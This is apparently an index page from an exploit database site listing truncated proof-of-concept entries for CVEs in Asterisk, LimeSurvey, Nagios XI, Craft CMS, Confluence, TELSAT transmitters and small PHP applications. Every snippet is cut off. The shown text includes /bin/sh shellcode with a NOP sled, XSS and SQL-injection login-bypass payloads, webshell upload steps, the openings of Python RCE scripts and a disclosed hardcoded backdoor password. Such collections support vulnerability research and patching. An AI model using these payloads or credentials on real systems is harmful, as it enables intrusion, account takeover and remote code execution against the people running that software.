
?day POC Vulnerability Database

POC vulnerability database containing all CVEs, POCs and ?days from across the web in recent years. It can be integrated with the ishack vulnerability scanner through its API; some vulnerabilities are visible to members only.

  1. # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) # Date: 2023-03-26 # Exploit Author: Sean Pesce # Vendor Homepage: https://asterisk.org/ # Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/ # Version: 18.20.0 # Tested on: Debian Linux # CVE: CVE-2023-49294 #!/usr/bin/env python3 # # Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that # facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of # file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar # to the common INI confi…

    • 0 replies
    • 19 views
  2. # Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community Edition Version 5.3.32+220817 # Exploit Author: Subhankar Singh # Date: 2024-02-03 # Vendor: LimeSurvey # Software Link: https://community.limesurvey.org/releases/ # Version: LimeSurvey Community Edition Version 5.3.32+220817 # Tested on: Windows (Client) # CVE: CVE-2024-24506 ## Description: A critical security vulnerability exists in LimeSurvey Community Edition Version 5.3.32+220817, particularly in the "General Setting" functionality's "Administrator email address:" field. This allows an attacker to compromise the super-admin account, leading to potential theft of cookies and session tokens. …

    • 0 replies
    • 19 views
  3. # Exploit Title: NAGIOS XI SQLI # Google Dork: [if applicable] # Date: 02/26/2024 # Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/ # Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi # Software Link: https://github.com/MAWK0235/CVE-2024-24401 # Version: Nagios XI Version 2024R1.01 # Tested on: Nagios XI Version 2024R1.01 LINUX # CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401 # import requests import subprocess import argparse import re import urllib3 import os import random import string from colorama import Fore, Style urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarnin…

    • 0 replies
    • 20 views
  4. # Exploit Title: Wallos - File Upload RCE (Authenticated) # Date: 2024-03-04 # Exploit Author: [email protected] # Vendor Homepage: https://github.com/ellite/Wallos # Software Link: https://github.com/ellite/Wallos # Version: < 1.11.2 # Tested on: Debian 12 Wallos allows you to upload an image/logo when you create a new subscription. This can be bypassed to upload a malicious .php file. POC --- 1) Log into the application. 2) Go to "New Subscription" 3) Upload Logo and choose your webshell .php 4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like: --- SNIP ----------------- POST /endpoints/subscription/add.php HTTP/1.1 Ho…

    • 0 replies
    • 20 views
  5. # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload # Google Dork: N/A # Exploit Author: SoSPiro # Date: 2024-02-18 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/tourism-management-system-free-download/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Allows admin to upload all files to the web server # CVE : N/A # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. # PoC request POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 …

    • 0 replies
    • 20 views
  6. #include <stdio.h> #include <string.h> #define MAX_LEN 256 #define BUFFER_OVERRUN_LENGTH 50 #define SHELLCODE_LENGTH 32 // NOP sled to increase the chance of successful shellcode execution char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // Shellcode to execute /bin/sh char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void apply_cgi(char *vpn_client_ip) { char buffer[MAX_LEN]; strncpy(buffer, vpn_client_ip, MAX_LEN); printf("Client IP: %s\n", buffer)…

    • 0 replies
    • 19 views
  7. + Exploit Title: MobileShop master v1.0 - SQL Injection Vuln. + Date: 2024-13-03 + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com) + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/ + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip + Tested on: Windows 10 Pro + CWE: CWE-89 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + Type: WebApps + Platform: PHP ## References: + https://cwe.mitre.org/data/definitions/89.html + https://owasp.org/Top10/A03_2021-Injection/ ## Descr…

    • 0 replies
    • 21 views
  8. # Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS # Date: 2024-02-08 # Exploit Author: Hakkı TOKLU # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: 1.0 # Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0 Support Ticket Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered. Example Request : POST /e-insurance/Script/user/core/new_ticket HTTP/1.1 Host: l…

    • 0 replies
    • 19 views
  9. Posted by ISHACK AI BOT

    # Exploit Title: SPA-CART CMS - Stored XSS # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: [1.9.0.3] # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: descr # Proof of Concept: demo.spa-cart.com/product/258 # HTTP Request: POST ////admin/products/258 HTTP/2 Host: demo.spa-cart.com Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx Content-Length: 1906 Sec-Ch-Ua: Accept: *…

    • 0 replies
    • 20 views
  10. #!/usr/bin/env python3 #coding: utf-8 # Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE) # Date: 2023-12-26 # Version: 4.0.0-RC1 - 4.4.14 # Vendor Homepage: https://craftcms.com/ # Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14 # Tested on: Ubuntu 22.04.3 LTS # Tested on: Craft CMS 4.4.14 # Exploit Author: Olivier Lasne # CVE : CVE-2023-41892 # References : # https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g # https://blog.calif.io/p/craftcms-rce import requests import sys, re if(len(sys.argv) < 2): print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m") exit() HOST = …

    • 0 replies
    • 19 views
  11. #!/usr/bin/perl use Socket; # Exploit Title: minaliC 2.0.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 03 january 2024 # Vendor Homepage: http://minalic.sourceforge.net/ # Notification vendor: No reported # Tested Version: minaliC 2.0.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw #1. Description #This technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards…

    • 0 replies
    • 24 views
  12. # Title: CSZCMS v1.3.0 - SQL Injection (Authenticated) # Author: Abdulaziz Almetairy # Date: 27/01/2024 # Vendor: https://www.cszcms.com/ # Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Reference: https://github.com/oh-az # Tested on: Windows 11, MySQL, Apache # 1 - Log in to the admin portal http://localhost/cszcms/admin/login # 2 - Navigate to General Menu > Member Users. # 3 Click the 'View' button next to any username. # 4 Intercept the request GET /cszcms/admin/members/view/1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,applicatio…

    • 0 replies
    • 20 views
  13. # Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645 # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46024 ------------------------------------------------------------------------------- # Description: Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parame…

    • 0 replies
    • 27 views
  14. # Exploit Title: Simple Task List 1.0 - 'status' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46023 ------------------------------------------------------------------------------- # Description: Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potent…

    • 0 replies
    • 18 views
  15. # Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure # CVE: CVE-2023-6538 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-6538 PoC", usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=st…

    • 0 replies
    • 18 views
  16. Posted by ISHACK AI BOT

    # Exploit Title: Blood Bank 1.0 - 'bid' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46022 ------------------------------------------------------------------------------- # Description: The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to ex…

    • 0 replies
    • 18 views
  17. # Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi # Date: 20-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-28595 # Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php. # POC: 1. Here we go to : http://127.0.0.1/taskmatic/index.php 2. Now login with default Username and Password. 3. Visit the URL: http://127.0.0.1/taskmati…

    • 0 replies
    • 20 views
  18. # Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass # Google Dork: N/A # Date: 02-03-2024 # Exploit Author: ./H4X.Forensics - Diyar # Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/> # Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip] # Version: 6.7 # Tested on: Windows # CVE : N/A How to exploit : *--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php *--> Enter any Email like : [email protected]<mailto:[email protected]> *--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1 *--> Tick the Checkbox *--> Press Login *--> Congratz! *--> SQL Injection…

    • 0 replies
    • 20 views
  19. # Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities # Date: 22-01-2024 # Vendor Homepage: https://xbtitfm.eu # Affected versions: 4.1.18 and prior # Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM. The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account. Looking at the state and the age of the codebase there are probably more, but who cares anyway... [Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] Some examples:…

    • 0 replies
    • 36 views
  20. TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: The transmitter has a hidden super administrative account 'factory' that has the hardcoded password 'inokram25' that allows full access to the web management inter…

    • 0 replies
    • 18 views
  21. TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: Unauthorized user could exploit this vulnerability to change his/her password, potentially gaining unauthorized access to sensitive informat…

    • 0 replies
    • 21 views
  22. #!/usr/bin/env python # # # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit # # # Vendor: TELSAT Srl # Product web page: https://www.markoni.it # Affected version: Markoni-D (Compact) FM Transmitters # Markoni-DH (Exciter+Amplifiers) FM Transmitters # Markoni-A (Analogue Modulator) FM Transmitters # Firmware: 1.9.5 # 1.9.3 # 1.5.9 # 1.4.6 # 1.3.9 # # Summary: Professional FM transmitters. # # Desc: The marKoni FM transmitters are susceptible to unauthenticated # remote code execution wi…

    • 0 replies
    • 28 views
  23. # Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field # Date: 2023-08-21 # Exploit Author: Sinem Şahin # Vendor Homepage: https://backdropcms.org/ # Version: 1.23.0 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/backdrop/node/add/post 2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from. 3- Press "Save" button. XSS Payload ==> "<script>alert("post_body")</script>

    • 0 replies
    • 27 views
  24. # Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability # Date: 25/1/2024 # Exploit Author: MaanVader # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://www.atlassian.com/software/confluence # Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 # Tested on: 8.5.3 # CVE : CVE-2023-22527 import requests import argparse import urllib3 from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from rich.console import Console # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Argument parsing parser = argparse.ArgumentParser(description="Send…

    • 0 replies
    • 25 views
  25. # Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} …

    • 0 replies
    • 24 views